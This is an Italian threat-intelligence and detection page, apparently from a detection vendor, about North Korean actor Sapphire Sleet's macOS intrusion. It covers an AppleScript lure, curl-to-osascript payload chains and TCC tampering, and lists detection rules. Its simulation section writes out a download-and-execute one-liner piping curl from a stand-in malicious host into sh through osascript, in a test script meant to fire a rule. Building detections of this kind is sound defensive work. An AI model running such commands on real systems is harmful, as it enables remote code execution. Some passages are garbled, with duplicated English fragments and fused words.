Analisi dell’intrusione di Sapphire Sleet su macOS dall’adescamento al compromesso
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
Microsoft Threat Intelligence ha segnalato una campagna focalizzata su macOS attribuita all’attore nordcoreano patrocinato dallo stato Sapphire Sleet. L’operazione si basa sull’ingegneria sociale per persuadere gli obiettivi a eseguire file AppleScript dannosi presentati come un aggiornamento legittimo dell’SDK di Zoom. Una volta eseguito, lo script recupera payload aggiuntivi tramite curl and osascript, espandendo l’intrusione in più fasi. Il malware è progettato per rubare credenziali, dati dei portafogli di criptovaluta e altre informazioni sensibili, oltre a bypassare le protezioni di sicurezza native di macOS per rimanere attivo sui sistemi compromessi.
Indagine
L’indagine descrive una catena di infezione a più fasi che inizia con un .scpt file esca e continua attraverso una sequenza di curl-a-osascript download di payload. I ricercatori hanno identificato diversi componenti di backdoor, tra cui com.apple.cli, un binario di servizi, icloudz, e com.google.chromes.updaters. Gli attori delle minacce sono stati anche osservati manomettere il database TCC di macOS per ottenere permessi di AppleEvents, utilizzando tecniche di caricamento riflessivo del codice e stabilendo persistenza tramite un demone di lancio. L’attività di esfiltrazione si basava su stringhe user-agent personalizzate e comunicazioni tramite l’API di Telegram Bot.
Mitigazione
Apple ha già rilasciato aggiornamenti per Safe Browsing e XProtect per interrompere l’infrastruttura della campagna e i componenti del malware. Microsoft raccomanda di bloccare l’esecuzione dei .scpt file, limitare pipe non sicure, monitorare i cambiamenti non autorizzati al database TCC e auditare le installazioni di daemon di lancio per voci sospette. Gli utenti dovrebbero essere anche avvertiti riguardo inviti a aggiornamenti software non richiesti e consigliati di non fornire credenziali tramite dialoghi o script inaspettati. curl pipelines, monitoring for unauthorized TCC database changes, and auditing launch daemon installations for suspicious entries. Users should also be warned about unsolicited software update prompts and advised not to provide credentials through unexpected dialogs or scripts.
Risposta
I difensori dovrebbero rilevare l’esecuzione di AppleScript dannosi, stringhe user-agent anormali e connessioni in uscita a domini noti di comando e controllo. Qualsiasi binario e daemon di lancio identificato dovrebbe essere immediatamente messo in quarantena o rimosso, seguito da reimpostazioni delle credenziali per gli utenti interessati e validazione dell’integrità del database TCC. Gli investigatori degli incidenti dovrebbero anche eseguire analisi forensi sui reperti di sistema raccolti e ripristinare i dati impattati da backup puliti ove necessario. curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.
graph TB %% Class definitions classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Technique nodes tech_user_execution[“<b>Tecnica</b> – <b>T1204.002 Esecuzione Utente: File Malevolo</b><br/><b>Descrizione</b>: Le vittime vengono indotte a eseguire un file dannoso che avvia l’intrusione.”] class tech_user_execution technique tech_trusted_dev_proxy[“<b>Tecnica</b> – <b>T1127 Esecuzione Proxy tramite Strumenti di Sviluppo Affidabili</b><br/><b>Descrizione</b>: Strumenti di sviluppo legittimi vengono usati come proxy per eseguire payload dannosi.”] class tech_trusted_dev_proxy technique tech_subvert_trust[“<b>Tecnica</b> – <b>T1553 Sovvertire i Controlli di Fiducia</b><br/><b>Descrizione</b>: Gli attaccanti manipolano relazioni di fiducia per ottenere privilegi o eseguire codice.”] class tech_subvert_trust technique tech_launch_daemon[“<b>Tecnica</b> – <b>T1543.004 Creazione o Modifica di Processo di Sistema: Launch Daemon</b><br/><b>Descrizione</b>: Viene creato o modificato un daemon per garantire persistenza.”] class tech_launch_daemon technique tech_alt_auth_material[“<b>Tecnica</b> – <b>T1550 Uso di Materiale di Autenticazione Alternativo</b><br/><b>Descrizione</b>: Credenziali o token rubati vengono usati per autenticarsi come utenti legittimi.”] class tech_alt_auth_material technique tech_archive_lib[“<b>Tecnica</b> – <b>T1560.002 Archiviazione dei Dati Raccolti: tramite Libreria</b><br/><b>Descrizione</b>: I dati vengono compressi tramite librerie software prima dell’esfiltrazione.”] class tech_archive_lib technique tech_exfil_alt_proto[“<b>Tecnica</b> – <b>T1048 Esfiltrazione tramite Protocollo Alternativo</b><br/><b>Descrizione</b>: I dati vengono trasmessi tramite protocolli non standard come DNS o FTP.”] class tech_exfil_alt_proto technique tech_dynamic_resolution[“<b>Tecnica</b> – <b>T1568 Risoluzione Dinamica</b><br/><b>Descrizione</b>: L’infrastruttura C2 viene risolta dinamicamente durante l’esecuzione.”] class tech_dynamic_resolution technique tech_reflective_loading[“<b>Tecnica</b> – <b>T1620 Caricamento Riflessivo del Codice</b><br/><b>Descrizione</b>: Il codice malevolo viene caricato direttamente in memoria.”] class tech_reflective_loading technique tech_system_binary_proxy[“<b>Tecnica</b> – <b>T1218.003 Esecuzione Proxy tramite Binari di Sistema</b><br/><b>Descrizione</b>: Binari di sistema affidabili vengono usati per eseguire codice dannoso.”] class tech_system_binary_proxy technique tech_modify_auth_process[“<b>Tecnica</b> – <b>T1556.001 Modifica del Processo di Autenticazione</b><br/><b>Descrizione</b>: I meccanismi di autenticazione vengono alterati per accettare credenziali false.”] class tech_modify_auth_process technique %% Connections tech_user_execution –>|leads_to| tech_trusted_dev_proxy tech_trusted_dev_proxy –>|enables| tech_subvert_trust tech_subvert_trust –>|creates| tech_launch_daemon tech_launch_daemon –>|uses| tech_alt_auth_material tech_alt_auth_material –>|prepares| tech_archive_lib tech_archive_lib –>|triggers| tech_exfil_alt_proto tech_exfil_alt_proto –>|facilitates| tech_dynamic_resolution tech_subvert_trust –>|employs| tech_reflective_loading tech_reflective_loading –>|updates| tech_launch_daemon tech_trusted_dev_proxy –>|leverages| tech_system_binary_proxy tech_system_binary_proxy –>|leads_to| tech_subvert_trust tech_alt_auth_material –>|supports| tech_modify_auth_process tech_modify_auth_process –>|continues| tech_exfil_alt_proto
Flusso di Attacco
Rilevamenti
Possibili Comunicazioni C2 su HTTP a IP Diretto con Porta Insolita (tramite proxy)
Visualizza
Possibile Esecuzione tramite uso di chmod e nohup in Singolo Comando (tramite cmdline)
Visualizza
Validazione Credenziali MacOS tramite Dscl Authonly (tramite cmdline)
Visualizza
Tentativo di Esecuzione Sospetta di Curl [MacOS] (tramite cmdline)
Visualizza
Archivio Creato nella Cartella Temporanea di MacOS (tramite file_event)
Visualizza
Permessi Pericolosi per un Binario/Script/Cartella impostati (tramite cmdline)
Visualizza
Indicatori di Compromissione (HashSha256) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso
Visualizza
Indicatori di Compromissione (SourceIP) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso
Visualizza
Indicatori di Compromissione (DestinationIP) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso
Visualizza
Rilevamento di Comunicazioni C2 Sapphire Sleet [Connessione di Rete Linux]
Visualizza
Rilevamento di Esecuzione di AppleScript con Piping di Curl su macOS [Creazione di Processo Linux]
Visualizza
Esecuzione Simulazione
Prerequisito: Il controllo preliminare di telemetria e baseline deve essere superato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il narrativo DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa e Comandi di Attacco:
Un avversario ha ottenuto uno script in stile PowerShell dannoso ospitato su un server remoto. Per evitare di creare un binario standalone, utilizzano l’interprete nativo di AppleScript (osascript) e pipe uncurldownload direttamente nel interprete, realizzando un “scarica ed esegui” in un solo comando. Questo corrisponde alla regola’sosascript+curlschema.# One-liner malizioso che dovrebbe attivare la regola osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'La linea di comando contiene sia
osascriptandcurl, quindi la condizione della regola Sigma (selection_osascript e selection_curl) si valuta come vero. -
Script di Test di Regressione:
# simulate_osascript_curl.sh # Scopo: Riprodurre la telemetria esatta che dovrebbe attivare la regola di rilevamento. set -e # Definire un payload innocuo per sicurezza (echo invece di codice effettivamente dannoso) MALICIOUS_URL="https://example.com/benign_payload.sh" # Creare un payload benigno fittizio che semplicemente stampa un messaggio. # In un vero test di red-team ospiteresti un vero script; qui lo manteniamo sicuro. curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true # Eseguire lo script AppleScript con curl pipe in un comando shell. osascript -e "do shell script "curl -s $MALICIOUS_URL | sh"" -
Comandi di Pulizia:
# cleanup_osascript_curl.sh # Rimuovere eventuali file temporanei e terminare processi vaganti. rm -f /tmp/benign_payload.sh pkill -f "osascript -e"